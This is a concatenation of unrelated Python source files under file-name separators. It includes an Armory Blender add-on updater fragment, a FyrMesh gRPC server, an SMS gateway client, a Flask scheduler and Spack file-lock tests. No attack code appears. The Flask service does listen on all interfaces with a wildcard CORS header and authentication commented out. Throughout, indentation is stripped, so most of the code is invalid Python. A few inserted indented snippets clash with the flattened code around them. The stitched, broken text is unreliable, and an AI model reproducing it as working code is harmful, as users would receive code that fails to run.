restore_repo(p, 'lib/haxebullet')
restore_repo(p, 'lib/haxerecast')
restore_repo(p, 'lib/zui')
restore_repo(p, 'lib/armory_tools')
restore_repo(p, 'lib/iron_format')
# restore_repo(p, 'Kha')
# restore_repo(p, 'Krom')
self.report({'INFO'}, 'Restored stable version')
return {"FINISHED"}
class ArmAddonInstallGitButton(bpy.types.Operator):
'''Install Git'''
bl_idname = "arm_addon.install_git"
bl_label = "Install Git"
bl_description = "Git is required for Armory Updater to work"
def execute(self, context):
webbrowser.open('https://git-scm.com')
return {"FINISHED"}
@persistent
def on_load_post(context):
# Detect local armsdk
# if os.path.exists(get_fp() + '/armsdk'):
# if ArmAddonStartButton.running:
# bpy.ops.arm_addon.stop()
if ArmAddonStartButton.running:
return
bpy.ops.arm_addon.start()
def register():
bpy.utils.register_class(ArmoryAddonPreferences)
bpy.utils.register_class(ArmAddonStartButton)
bpy.utils.register_class(ArmAddonStopButton)
bpy.utils.register_class(ArmAddonUpdateButton)
bpy.utils.register_class(ArmAddonRestoreButton)
bpy.utils.register_class(ArmAddonInstallGitButton)
bpy.app.handlers.load_post.append(on_load_post)
def unregister():
bpy.ops.arm_addon.stop()
bpy.utils.unregister_class(ArmoryAddonPreferences)
bpy.utils.unregister_class(ArmAddonStartButton)
bpy.utils.unregister_class(ArmAddonStopButton)
bpy.utils.unregister_class(ArmAddonUpdateButton)
bpy.utils.unregister_class(ArmAddonRestoreButton)
bpy.utils.unregister_class(ArmAddonInstallGitButton)
bpy.app.handlers.load_post.remove(on_load_post)
if __name__ == "__main__":
register()
|
interface.py
|
"""
===========================================================================
MIT License
Copyright (c) 2021 Manish Meganathan, Mariyam A.Ghani
Permission is hereby granted, free of charge, to any person obtaining a copy
of this software and associated documentation files (the "Software"), to deal
in the Software without restriction, including without limitation the rights
to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
copies of the Software, and to permit persons to whom the Software is
furnished to do so, subject to the following conditions:
The above copyright notice and this permission notice shall be included in all
copies or substantial portions of the Software.
THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
SOFTWARE.
===========================================================================
FyrMesh FyrLINK server
===========================================================================
"""
import os
import sys
import json
import grpc
import time
import threading
import concurrent.futures as futures
import proto.fyrmesh_pb2 as fyrmesh_pb2
import proto.fyrmesh_pb2_grpc as fyrmesh_pb2_grpc
from fyrlink.parsers import logtime
from fyrlink.workers import commandqueue, logqueue, loglock
from fyrlink.workers import reader, writer, logger, readfromqueue
from fyrlink.workers import KillableThread
# Create lock synchronisation object
threadlock = threading.Lock()
class Interface(fyrmesh_pb2_grpc.InterfaceServicer):
""" Class that implements the Interface gRPC Server """
def Read(self, request, context):
""" A method that implements the 'Read' runtime of the Interface
server. Collects log messages from the read queue and streams them
to the gRPC Interface client. """
if request.triggermessage == "start-stream-read":
with loglock:
while True:
message = readfromqueue(logqueue)
if message:
yield fyrmesh_pb2.ComplexLog(
logsource=message['source'],
logtype=message['type'],
logtime=message['time'],
logmessage=message['log'],
logmetadata=message['metadata']
)
else:
pass
else:
while True:
time.sleep(2)
yield fyrmesh_pb2.ComplexLog(
logsource="LINK",
logtype="protolog",
logtime=logtime(),
logmessage="(error) invalid read stream initiation code",
logmetadata={
"server": "LINK",
"service": "Read",
"error": "nil"
})
def Write(self, request, context):
""" A method that implements the 'Write' runtime of the Interface
server. Puts the command received into the write queue with the
appropriate structure. """
command = request.command
metadata = request.metadata
try:
commandqueue.put({"type": "controlcommand", "command": command, **metadata})
logqueue.put({
"source": "LINK", "type": "protolog", "time": logtime(),
"log": f"(success) command '{command}' written to control node successfully",
"metadata": {
"server": "LINK",
"service": "Write",
"error": "nil"
}})
except Exception as e:
logqueue.put({
"source": "LINK", "type": "protolog", "time": logtime(),
"log": f"(failure) command '{command}' failed to be written to control node.",
"metadata": {
"server": "LINK",
"service": "Write",
"error": str(e)
}})
return fyrmesh_pb2.Acknowledge(success=False, error=str(e))
return fyrmesh_pb2.Acknowledge(success=True, error="nil")
def grpc_serve():
""" A function that sets up and serves the gRPC LINK Interface Server """
# Create a gRPC server object
server = grpc.server(futures.ThreadPoolExecutor(max_workers=10))
# Register the server as an Interface server
fyrmesh_pb2_grpc.add_InterfaceServicer_to_server(Interface(), server)
# Retrieve the FYRMESHCONFIG env var
configpath = os.environ.get("FYRMESHCONFIG")
if not configpath:
logqueue.put({
"source": "LINK",
"type": "serverlog",
"time": logtime(),
"log": "(error) could not read config. 'FYRMESHCONFIG' env variable is not set",
"metadata": {}
})
sys.exit()
# Read the config file
configfilepath = os.path.join(configpath, "config.json")
with open(configfilepath) as configfile:
configdata = json.load(configfile)
# Setup the server listening port and start it.
port = configdata['services']['LINK']['port']
server.add_insecure_port(f'[::]:{port}')
server.start()
# Log the start of the server.
logqueue.put({
"source": "LINK",
"type": "serverlog",
"time": logtime(),
"log": "(startup) interface link grpc server started on http://localhost:50000",
"metadata": {}
})
# Server will wait indefinitely for termination
server.wait_for_termination()
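# A hedged illustration of the config.json structure that grpc_serve() reads;
# only the key accessed above is shown and the port value is hypothetical.
_EXAMPLE_LINK_CONFIG = {
    "services": {
        "LINK": {"port": 50000}
    }
}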
if __name__ == "__main__":
# Define the IO thread workers that run concurrently
readerthread = KillableThread(name="reader", target=reader, daemon=True)
writerthread = KillableThread(name="writer", target=writer, daemon=True)
#loggerthread = KillableThread(name="logger", target=logger, daemon=True)
# Start the IO thread workers
readerthread.start()
writerthread.start()
#loggerthread.start()
try:
# Start the gRPC server
grpc_serve()
except KeyboardInterrupt:
# Kill the IO thread workers
readerthread.kill()
writerthread.kill()
#loggerthread.kill()
# Exit without handling regular exit runtimes such as printing tracebacks
os._exit(1)
|
__init__.py
|
#!/usr/bin/env python
# vim: ai ts=4 sts=4 et sw=4
import urllib, urllib2
import random, cgi
from threading import Thread
from SocketServer import ThreadingMixIn
from BaseHTTPServer import BaseHTTPRequestHandler, HTTPServer
class Client(object):
PROTOCOL_VERSION = "SPOMSKY/0.91"
class Server(ThreadingMixIn, HTTPServer):
pass
class RequestHandler(BaseHTTPRequestHandler):
def do_POST(self):
# parse the form data (what
# the hell *is* this junk?)
form = cgi.FieldStorage(
fp = self.rfile,
headers = self.headers,
environ = {
"REQUEST_METHOD": "POST",
"CONTENT_TYPE": self.headers["content-type"] })
# if a callback has been registered (via
# Client#subscribe), call it along with
# the source (phone number), and contents
if hasattr(self.server.spomsky_client, "callback"):
self.server.spomsky_client.callback(
form["source"].value, form["body"].value)
# always respond positively
self.send_response(200)
self.end_headers()
# Does nothing except prevent HTTP
# requests being echoed to the screen
def log_request(*args):
pass
def __init__(self, server_host="localhost", server_port=8100, client_host="localhost", client_port=None):
# copy the arguments into
# their attrs unchecked (!!)
self.server_host = server_host
self.server_port = int(server_port)
self.client_host = client_host
# initialize attributes
self.subscription_id = None
self.server = None
# if no client port was provided, randomly pick a
# high one. this is a bad idea, since it can fail.
# TODO: check that the port is available!
self.client_port = int(client_port) if client_port else random.randrange(10000, 11000)
def __url(self, path):
return "http://%s:%d/%s" % (self.server_host, self.server_port, path)
def send(self, destination, body):
# build the POST form
data = urllib.urlencode({
"version": self.PROTOCOL_VERSION,
"destination": destination,
"body": body
})
try:
# attempt to POST to spomskyd
f = urllib2.urlopen(self.__url("send"), data)
# read the response, even though we
# don't care what it contains (for now)
str = f.read()
f.close()
# urllib2 raises an exception on failure; we
# don't want to blow up the whole process,
# so just return false instead
except:
return False
# nothing went bang
return True
def subscribe(self, callback):
# if we are already
# subscribed, abort
if self.server:
return False
# note down the callback, to be called
# when a message arrives from the server
self.callback = callback
# create an HTTP server (to listen for callbacks from
# the spomsky server, to notify us of incoming SMS)
self.server = self.Server(("", self.client_port), self.RequestHandler)
self.server.spomsky_client = self
# start the server in a separate thread, and daemonize it
# to prevent it from hanging once the main thread terminates
self.thread = Thread(target=self.server.serve_forever)
self.thread.daemon = True
self.thread.start()
# build the POST form
data = urllib.urlencode({
"version": self.PROTOCOL_VERSION,
"host": self.client_host,
"port": self.client_port,
"path": "receiver"
})
try:
# post the request to spomskyd, and fetch the response
f = urllib2.urlopen(self.__url("receive/subscribe"), data)
str = f.read()
f.close()
# the subscription was successful, so store the uuid,
# and return true to indicate that we're subscribed
self.subscription_id = f.info()["x-subscription-uuid"]
return True
# something went wrong, so reset the
# subscription id and return false
except:
self.subscription_id = None
return False
def unsubscribe(self):
# if we are subscribed, then send an HTTP
# POST request to spomskyd to instruct it
# to stop sending us messages
if self.subscription_id:
# build the POST form
data = urllib.urlencode({
"version": self.PROTOCOL_VERSION,
"uuid": self.subscription_id
})
try:
# post the request to spomskyd, and fetch the response
f = urllib2.urlopen(self.__url("receive/unsubscribe"), data)
str = f.read()
f.close()
# request failed? no big deal, we've
# probably already been unsubscribed
except:
pass
# unset instance vars
self.callback = None
self.server = None
self.thread = None
# what could possibly
# have gone wrong?
return True
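# A minimal usage sketch of the Client above (the phone number and message are
# hypothetical; assumes a spomskyd server is reachable at the default host/port):
if __name__ == "__main__":
    def on_sms(source, body):
        print("received %r from %s" % (body, source))

    client = Client()
    if client.subscribe(on_sms):
        client.send("+15550000000", "hello from the spomsky client")
        client.unsubscribe()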
|
ThreadImpl.py
|
import threading
import thread
class ThreadImpl:
def __init__(self, threadId, taskName):
self.threadId = threadId
self.taskName = taskName
def execute(self):
print(self.threadId, self.taskName)
threadImpl = ThreadImpl("1", "Task 1")
#t = threading.Thread(target=threadImpl.execute)
#t.start()
|
main.py
|
"""Main loop for scheduler subsystem."""
from shared import config
from shared.controller import Controller
from scheduler.scheduler import Scheduler
from flask import Flask, request, jsonify
from flask_htpasswd import HtPasswdAuth
from flask_cors import CORS
import threading
from shared.streamtologger import StreamToLogger
import logging
import sys
logging.basicConfig(
filename=config.LOG_DIR + "scheduler.log",
# encoding='utf-8',
filemode='a', format='%(asctime)s %(levelname)s:%(message)s',
level=config.LOG_LEVEL)
logger = logging.getLogger("scheduler")
logger.setLevel(config.LOG_LEVEL)
werklog = logging.getLogger('werkzeug')
werklog.setLevel(logging.ERROR)
# redirect stdout and stderr to log file - do this before production
sys.stdout = StreamToLogger(logger,logging.INFO)
sys.stderr = StreamToLogger(logger,logging.ERROR)
def init_controller_obj():
# let's get this party started
controller_obj = Scheduler()
return controller_obj
def program_loop(controller_obj):
try:
controller_obj.start()
except KeyboardInterrupt:
logging.info(f"{whoami} interrupted.")
controller_obj.stop()
except:
logging.exception('Got exception on main handler')
raise
whoami = "scheduler"
controller_obj = init_controller_obj()
# threaded program_loop(controller_obj)
#
thread_obj = threading.Thread(target=program_loop, args=(controller_obj,), daemon=False)
thread_obj.start()
# Flask controller
#
# Create the server object
app = Flask(__name__, static_url_path="")
#
# Configure basic auth with htpasswd file
# app.config['FLASK_HTPASSWD_PATH'] = config.HTPASSWD_FILE
# app.config['FLASK_SECRET'] = 'SECRETSECRETSECRET'
# app.config['FLASK_AUTH_ALL']=True
# htpasswd = HtPasswdAuth(app)
#
# Serve CORS header
domain_list = []
for host in config.CONTROLLERS.values():
domain_list.append("http://" + host["server"] + ':' + str(host["port"]))
domain_list.append("http://" + host["altserv"] + ':' + str(host["port"]))
cors = CORS(app,
# supports_credentials=True,
origins=domain_list)
@app.route("/cmd",methods = ['POST', 'GET'])
def cmd():
if request.method == 'GET':
order_obj = request.args.to_dict(flat=True)
else:
order_obj = request.get_json(force=True)
response = jsonify(controller_obj.act_on_order(order_obj))
response.headers.add('Access-Control-Allow-Origin', '*')
return response
app.run(host="0.0.0.0", port=config.CONTROLLERS[whoami]["port"],
debug=config.DEBUG,use_reloader=False)
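# A hedged client-side sketch for the /cmd endpoint above (the order fields are
# hypothetical; the accepted schema is defined by Scheduler.act_on_order):
#
#   import requests
#   requests.post("http://localhost:<port>/cmd", json={"cmd": "status"})
#   # or equivalently as a GET with query parameters:
#   requests.get("http://localhost:<port>/cmd", params={"cmd": "status"})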
|
lrp_indicator.py
|
####################################################################
# ### lrp_indicator.py ###
####################################################################
# ### Author: SAS Institute Inc. ###
####################################################################
# ###
# Copyright (c) 2020, SAS Institute Inc., Cary, NC, USA. ###
# All Rights Reserved. ###
# SPDX-License-Identifier: Apache-2.0 ###
# ###
####################################################################
import sys
import threading
import time
from typing import Optional, Text
class LRPIndicator:
"""
Custom context manager used to indicate that a long-running process is currently executing. An :code:`enter_message`
can be displayed when entering the context manager. While running, a progression of the given :code:`character` will
display to stdout up to the given :code:`line_length`. Once the :code:`line_length` is reached, the progression of
:code:`characters` will be removed and the progression will start again from the end of the :code:`enter_message`.
Upon exit, the line will be filled with the given :code:`character` up to the given :code:`line_length` and a
configurable :code:`exit_message` will be displayed.
"""
def __init__(self, enter_message: Text, character: Text = ".", delay: float = 0.9, line_length: int = 50):
"""
Constructs a new :code:`LRPIndicator` instance.
:param enter_message: The message to display when entering the context manager.
:param character: The character to use in the indicator progression.
:param delay: The delay between printing each character in the progression.
:param line_length: The total length of the indicator line (i.e. message + character progression).
"""
# indicator attributes
self._indicator_char: Text = character
self._indicator_delay: float = delay
self._indicator_count: int = 0
# minimum indicator length is 3 chars
if len(enter_message) < (line_length - 2):
self._indicator_total = line_length - len(enter_message)
else:
# message fills the line; fall back to the minimum progression length
self._indicator_total = 3
# line attributes
self._line_length: int = line_length
# status
self._process_running: bool = False
# thread
self._screen_lock: Optional[threading.Lock] = None
self._thread: Optional[threading.Thread] = None
# messages
self._enter_message: Text = enter_message
# exit message can be set before context exits
self.exit_message: Text = "DONE"
def __enter__(self):
"""
Sets up the thread for running the indicator and displays the :code:`enter_message`.
:return: This LRPIndicator instance.
"""
if sys.stdout.isatty():
# hide the cursor
sys.stdout.write("\033[?25l")
# print the enter message
sys.stdout.write(self._enter_message)
sys.stdout.flush()
# start the thread
self._screen_lock = threading.Lock()
self._process_running = True
self._thread = threading.Thread(target=self._indicator_target)
self._thread.start()
else:
sys.stdout.write(self._enter_message.ljust(self._line_length, self._indicator_char))
return self
def __exit__(self, exc_type, exc_val, exc_tb):
"""
Closes the indicator context and displays the configured :code:`exit_message`.
:param exc_type: The exception type if an error was raised while executing the code block.
:param exc_val: The exception value if an error was raised while executing the code block.
:param exc_tb: The traceback if an error was raised while executing the code block.
"""
if sys.stdout.isatty():
self._process_running = False
sys.stdout.write(f"\r{self._enter_message.ljust(self._line_length, self._indicator_char)}")
# print exit message and move to next line
sys.stdout.write(f"{self.exit_message}\n")
# show the cursor again
sys.stdout.write("\033[?25h")
sys.stdout.flush()
def _indicator_target(self):
"""
Target method for the indicator thread.
"""
while self._process_running:
# if the indicator total hasn't been reached, print another
if self._indicator_count < self._indicator_total:
sys.stdout.write(self._indicator_char)
self._indicator_count += 1
else:
sys.stdout.write("\r")
sys.stdout.write(" " * self._line_length)
sys.stdout.write(f"\r{self._enter_message}")
self._indicator_count = 0
sys.stdout.flush()
time.sleep(self._indicator_delay)
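# A minimal usage sketch of the context manager documented above; the simulated
# work (time.sleep) and the messages are hypothetical.
if __name__ == "__main__":
    with LRPIndicator(enter_message="Deploying") as indicator:
        time.sleep(3)  # long-running work would happen here
        indicator.exit_message = "COMPLETED"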
|
lock.py
|
# Copyright 2013-2020 Lawrence Livermore National Security, LLC and other
# Spack Project Developers. See the top-level COPYRIGHT file for details.
#
# SPDX-License-Identifier: (Apache-2.0 OR MIT)
"""These tests ensure that our lock works correctly.
This can be run in two ways.
First, it can be run as a node-local test, with a typical invocation like
this::
spack test lock
You can *also* run it as an MPI program, which allows you to test locks
across nodes. So, e.g., you can run the test like this::
mpirun -n 7 spack test lock
And it will test locking correctness among MPI processes. Ideally, you
want the MPI processes to span across multiple nodes, so, e.g., for SLURM
you might do this::
srun -N 7 -n 7 -m cyclic spack test lock
You can use this to test whether your shared filesystem properly supports
POSIX reader-writer locking with byte ranges through fcntl.
If you want to test on multiple filesystems, you can modify the
``locations`` list below. By default it looks like this::
locations = [
tempfile.gettempdir(), # standard tmp directory (potentially local)
'/nfs/tmp2/%u', # NFS tmp mount
'/p/lscratch*/%u' # Lustre scratch mount
]
Add names and paths for your preferred filesystem mounts to test on them;
the tests are parametrized to run on all the filesystems listed in this
list. Note that 'tmp' will be skipped for MPI testing, as it is often a
node-local filesystem, and multi-node tests will fail if the locks aren't
actually on a shared filesystem.
"""
import collections
import errno
import fcntl
import os
import socket
import shutil
import tempfile
import traceback
import glob
import getpass
from contextlib import contextmanager
from multiprocessing import Process, Queue
import pytest
import llnl.util.lock as lk
import llnl.util.multiproc as mp
from llnl.util.filesystem import touch
#
# This test can be run with MPI. MPI is "enabled" if we can import
# mpi4py and the number of total MPI processes is greater than 1.
# Otherwise it just runs as a node-local test.
#
# NOTE: MPI mode is different from node-local mode in that node-local
# mode will spawn its own test processes, while MPI mode assumes you've
# run this script as a SPMD application. In MPI mode, no additional
# processes are spawned, and you need to ensure that you mpirun the
# script with enough processes for all the multiproc_test cases below.
#
# If you don't run with enough processes, tests that require more
# processes than you currently have will be skipped.
#
mpi = False
comm = None
try:
from mpi4py import MPI
comm = MPI.COMM_WORLD
if comm.size > 1:
mpi = True
except ImportError:
pass
"""This is a list of filesystem locations to test locks in. Paths are
expanded so that %u is replaced with the current username. '~' is also
legal and will be expanded to the user's home directory.
Tests are skipped for directories that don't exist, so you'll need to
update this with the locations of NFS, Lustre, and other mounts on your
system.
"""
locations = [
tempfile.gettempdir(),
os.path.join('/nfs/tmp2/', getpass.getuser()),
os.path.join('/p/lscratch*/', getpass.getuser()),
]
"""This is the longest a failed multiproc test will take.
Barriers will time out and raise an exception after this interval.
In MPI mode, barriers don't time out (they hang). See mpi_multiproc_test.
"""
barrier_timeout = 5
"""This is the lock timeout for expected failures.
This may need to be higher for some filesystems."""
lock_fail_timeout = 0.1
def make_readable(*paths):
for path in paths:
mode = 0o555 if os.path.isdir(path) else 0o444
os.chmod(path, mode)
def make_writable(*paths):
for path in paths:
mode = 0o755 if os.path.isdir(path) else 0o744
os.chmod(path, mode)
@contextmanager
def read_only(*paths):
modes = [os.stat(p).st_mode for p in paths]
make_readable(*paths)
yield
for path, mode in zip(paths, modes):
os.chmod(path, mode)
@pytest.fixture(scope='session', params=locations)
def lock_test_directory(request):
"""This fixture causes tests to be executed for many different mounts.
See the ``locations`` list above for details.
"""
return request.param
@pytest.fixture(scope='session')
def lock_dir(lock_test_directory):
parent = next((p for p in glob.glob(lock_test_directory)
if os.path.exists(p) and os.access(p, os.W_OK)), None)
if not parent:
# Skip filesystems that don't exist or aren't writable
pytest.skip("requires filesystem: '%s'" % lock_test_directory)
elif mpi and parent == tempfile.gettempdir():
# Skip local tmp test for MPI runs
pytest.skip("skipping local tmp directory for MPI test.")
tempdir = None
if not mpi or comm.rank == 0:
tempdir = tempfile.mkdtemp(dir=parent)
if mpi:
tempdir = comm.bcast(tempdir)
yield tempdir
if mpi:
# rank 0 may get here before others, in which case it'll try to
# remove the directory while other processes try to re-create the
# lock. This will give errno 39: directory not empty. Use a
# barrier to ensure everyone is done first.
comm.barrier()
if not mpi or comm.rank == 0:
make_writable(tempdir)
shutil.rmtree(tempdir)
@pytest.fixture
def private_lock_path(lock_dir):
"""In MPI mode, this is a private lock for each rank in a multiproc test.
For other modes, it is the same as a shared lock.
"""
lock_file = os.path.join(lock_dir, 'lockfile')
if mpi:
lock_file += '.%s' % comm.rank
yield lock_file
if os.path.exists(lock_file):
make_writable(lock_dir, lock_file)
os.unlink(lock_file)
@pytest.fixture
def lock_path(lock_dir):
"""This lock is shared among all processes in a multiproc test."""
lock_file = os.path.join(lock_dir, 'lockfile')
yield lock_file
if os.path.exists(lock_file):
make_writable(lock_dir, lock_file)
os.unlink(lock_file)
def test_poll_interval_generator():
interval_iter = iter(
lk.Lock._poll_interval_generator(_wait_times=[1, 2, 3]))
intervals = list(next(interval_iter) for i in range(100))
assert intervals == [1] * 20 + [2] * 40 + [3] * 40
def local_multiproc_test(*functions, **kwargs):
"""Order some processes using simple barrier synchronization."""
b = mp.Barrier(len(functions), timeout=barrier_timeout)
args = (b,) + tuple(kwargs.get('extra_args', ()))
procs = [Process(target=f, args=args, name=f.__name__)
for f in functions]
for p in procs:
p.start()
for p in procs:
p.join()
assert all(p.exitcode == 0 for p in procs)
def mpi_multiproc_test(*functions):
"""SPMD version of multiproc test.
This needs to be run like so:
srun spack test lock
Each process executes its corresponding function. This is different
from ``multiproc_test`` above, which spawns the processes. This will
skip tests if there are too few processes to run them.
"""
procs = len(functions)
if procs > comm.size:
pytest.skip("requires at least %d MPI processes" % procs)
comm.Barrier() # barrier before each MPI test
include = comm.rank < len(functions)
subcomm = comm.Split(include)
class subcomm_barrier(object):
"""Stand-in for multiproc barrier for MPI-parallel jobs."""
def wait(self):
subcomm.Barrier()
if include:
try:
functions[subcomm.rank](subcomm_barrier())
except BaseException:
# aborting is the best we can do for MPI tests without
# hanging, since we're using MPI barriers. This will fail
# early and it loses the nice pytest output, but at least it
# gets us a stacktrace on the processes that failed.
traceback.print_exc()
comm.Abort()
subcomm.Free()
comm.Barrier() # barrier after each MPI test.
"""``multiproc_test()`` should be called by tests below.
``multiproc_test()`` will work for either MPI runs or for local runs.
"""
multiproc_test = mpi_multiproc_test if mpi else local_multiproc_test
#
# Process snippets below can be composed into tests.
#
class AcquireWrite(object):
def __init__(self, lock_path, start=0, length=0):
self.lock_path = lock_path
self.start = start
self.length = length
@property
def __name__(self):
return self.__class__.__name__
def __call__(self, barrier):
lock = lk.Lock(self.lock_path, self.start, self.length)
lock.acquire_write() # grab exclusive lock
barrier.wait()
barrier.wait() # hold the lock until timeout in other procs.
class AcquireRead(object):
def __init__(self, lock_path, start=0, length=0):
self.lock_path = lock_path
self.start = start
self.length = length
@property
def __name__(self):
return self.__class__.__name__
def __call__(self, barrier):
lock = lk.Lock(self.lock_path, self.start, self.length)
lock.acquire_read() # grab shared lock
barrier.wait()
barrier.wait() # hold the lock until timeout in other procs.
class TimeoutWrite(object):
def __init__(self, lock_path, start=0, length=0):
self.lock_path = lock_path
self.start = start
self.length = length
@property
def __name__(self):
return self.__class__.__name__
def __call__(self, barrier):
lock = lk.Lock(self.lock_path, self.start, self.length)
barrier.wait() # wait for lock acquire in first process
with pytest.raises(lk.LockTimeoutError):
lock.acquire_write(lock_fail_timeout)
barrier.wait()
class TimeoutRead(object):
def __init__(self, lock_path, start=0, length=0):
self.lock_path = lock_path
self.start = start
self.length = length
@property
def __name__(self):
return self.__class__.__name__
def __call__(self, barrier):
lock = lk.Lock(self.lock_path, self.start, self.length)
barrier.wait() # wait for lock acquire in first process
with pytest.raises(lk.LockTimeoutError):
lock.acquire_read(lock_fail_timeout)
barrier.wait()
#
# Test that exclusive locks on other processes time out when an
# exclusive lock is held.
#
def test_write_lock_timeout_on_write(lock_path):
multiproc_test(
AcquireWrite(lock_path),
TimeoutWrite(lock_path))
def test_write_lock_timeout_on_write_2(lock_path):
multiproc_test(
AcquireWrite(lock_path),
TimeoutWrite(lock_path),
TimeoutWrite(lock_path))
def test_write_lock_timeout_on_write_3(lock_path):
multiproc_test(
AcquireWrite(lock_path),
TimeoutWrite(lock_path),
TimeoutWrite(lock_path),
TimeoutWrite(lock_path))
def test_write_lock_timeout_on_write_ranges(lock_path):
multiproc_test(
AcquireWrite(lock_path, 0, 1),
TimeoutWrite(lock_path, 0, 1))
def test_write_lock_timeout_on_write_ranges_2(lock_path):
multiproc_test(
AcquireWrite(lock_path, 0, 64),
AcquireWrite(lock_path, 65, 1),
TimeoutWrite(lock_path, 0, 1),
TimeoutWrite(lock_path, 63, 1))
def test_write_lock_timeout_on_write_ranges_3(lock_path):
multiproc_test(
AcquireWrite(lock_path, 0, 1),
AcquireWrite(lock_path, 1, 1),
TimeoutWrite(lock_path),
TimeoutWrite(lock_path),
TimeoutWrite(lock_path))
def test_write_lock_timeout_on_write_ranges_4(lock_path):
multiproc_test(
AcquireWrite(lock_path, 0, 1),
AcquireWrite(lock_path, 1, 1),
AcquireWrite(lock_path, 2, 456),
AcquireWrite(lock_path, 500, 64),
TimeoutWrite(lock_path),
TimeoutWrite(lock_path),
TimeoutWrite(lock_path))
#
# Test that shared locks on other processes time out when an
# exclusive lock is held.
#
def test_read_lock_timeout_on_write(lock_path):
multiproc_test(
AcquireWrite(lock_path),
TimeoutRead(lock_path))
def test_read_lock_timeout_on_write_2(lock_path):
multiproc_test(
AcquireWrite(lock_path),
TimeoutRead(lock_path),
TimeoutRead(lock_path))
def test_read_lock_timeout_on_write_3(lock_path):
multiproc_test(
AcquireWrite(lock_path),
TimeoutRead(lock_path),
TimeoutRead(lock_path),
TimeoutRead(lock_path))
def test_read_lock_timeout_on_write_ranges(lock_path):
"""small write lock, read whole file."""
multiproc_test(
AcquireWrite(lock_path, 0, 1),
TimeoutRead(lock_path))
def test_read_lock_timeout_on_write_ranges_2(lock_path):
"""small write lock, small read lock"""
multiproc_test(
AcquireWrite(lock_path, 0, 1),
TimeoutRead(lock_path, 0, 1))
def test_read_lock_timeout_on_write_ranges_3(lock_path):
"""two write locks, overlapping read locks"""
multiproc_test(
AcquireWrite(lock_path, 0, 1),
AcquireWrite(lock_path, 64, 128),
TimeoutRead(lock_path, 0, 1),
TimeoutRead(lock_path, 128, 256))
#
# Test that exclusive locks time out when shared locks are held.
#
def test_write_lock_timeout_on_read(lock_path):
multiproc_test(
AcquireRead(lock_path),
TimeoutWrite(lock_path))
def test_write_lock_timeout_on_read_2(lock_path):
multiproc_test(
AcquireRead(lock_path),
TimeoutWrite(lock_path),
TimeoutWrite(lock_path))
def test_write_lock_timeout_on_read_3(lock_path):
multiproc_test(
AcquireRead(lock_path),
TimeoutWrite(lock_path),
TimeoutWrite(lock_path),
TimeoutWrite(lock_path))
def test_write_lock_timeout_on_read_ranges(lock_path):
multiproc_test(
AcquireRead(lock_path, 0, 1),
TimeoutWrite(lock_path))
def test_write_lock_timeout_on_read_ranges_2(lock_path):
multiproc_test(
AcquireRead(lock_path, 0, 1),
TimeoutWrite(lock_path, 0, 1))
def test_write_lock_timeout_on_read_ranges_3(lock_path):
multiproc_test(
AcquireRead(lock_path, 0, 1),
AcquireRead(lock_path, 10, 1),
TimeoutWrite(lock_path, 0, 1),
TimeoutWrite(lock_path, 10, 1))
def test_write_lock_timeout_on_read_ranges_4(lock_path):
multiproc_test(
AcquireRead(lock_path, 0, 64),
TimeoutWrite(lock_path, 10, 1),
TimeoutWrite(lock_path, 32, 1))
def test_write_lock_timeout_on_read_ranges_5(lock_path):
multiproc_test(
AcquireRead(lock_path, 64, 128),
TimeoutWrite(lock_path, 65, 1),
TimeoutWrite(lock_path, 127, 1),
TimeoutWrite(lock_path, 90, 10))
#
# Test that exclusive locks time out while lots of shared locks are held.
#
def test_write_lock_timeout_with_multiple_readers_2_1(lock_path):
multiproc_test(
AcquireRead(lock_path),
AcquireRead(lock_path),
TimeoutWrite(lock_path))
def test_write_lock_timeout_with_multiple_readers_2_2(lock_path):
multiproc_test(
AcquireRead(lock_path),
AcquireRead(lock_path),
TimeoutWrite(lock_path),
TimeoutWrite(lock_path))
def test_write_lock_timeout_with_multiple_readers_3_1(lock_path):
multiproc_test(
AcquireRead(lock_path),
AcquireRead(lock_path),
AcquireRead(lock_path),
TimeoutWrite(lock_path))
def test_write_lock_timeout_with_multiple_readers_3_2(lock_path):
multiproc_test(
AcquireRead(lock_path),
AcquireRead(lock_path),
AcquireRead(lock_path),
TimeoutWrite(lock_path),
TimeoutWrite(lock_path))
def test_write_lock_timeout_with_multiple_readers_2_1_ranges(lock_path):
multiproc_test(
AcquireRead(lock_path, 0, 10),
AcquireRead(lock_path, 0.5, 10),
TimeoutWrite(lock_path, 5, 5))
def test_write_lock_timeout_with_multiple_readers_2_3_ranges(lock_path):
multiproc_test(
AcquireRead(lock_path, 0, 10),
AcquireRead(lock_path, 5, 15),
TimeoutWrite(lock_path, 0, 1),
TimeoutWrite(lock_path, 11, 3),
TimeoutWrite(lock_path, 7, 1))
def test_write_lock_timeout_with_multiple_readers_3_1_ranges(lock_path):
multiproc_test(
AcquireRead(lock_path, 0, 5),
AcquireRead(lock_path, 5, 5),
AcquireRead(lock_path, 10, 5),
TimeoutWrite(lock_path, 0, 15))
def test_write_lock_timeout_with_multiple_readers_3_2_ranges(lock_path):
multiproc_test(
AcquireRead(lock_path, 0, 5),
AcquireRead(lock_path, 5, 5),
AcquireRead(lock_path, 10, 5),
TimeoutWrite(lock_path, 3, 10),
TimeoutWrite(lock_path, 5, 1))
@pytest.mark.skipif(os.getuid() == 0, reason='user is root')
def test_read_lock_on_read_only_lockfile(lock_dir, lock_path):
"""read-only directory, read-only lockfile."""
touch(lock_path)
with read_only(lock_path, lock_dir):
lock = lk.Lock(lock_path)
with lk.ReadTransaction(lock):
pass
with pytest.raises(lk.LockROFileError):
with lk.WriteTransaction(lock):
pass
def test_read_lock_read_only_dir_writable_lockfile(lock_dir, lock_path):
"""read-only directory, writable lockfile."""
touch(lock_path)
with read_only(lock_dir):
lock = lk.Lock(lock_path)
with lk.ReadTransaction(lock):
pass
with lk.WriteTransaction(lock):
pass
@pytest.mark.skipif(os.getuid() == 0, reason='user is root')
def test_read_lock_no_lockfile(lock_dir, lock_path):
"""read-only directory, no lockfile (so can't create)."""
with read_only(lock_dir):
lock = lk.Lock(lock_path)
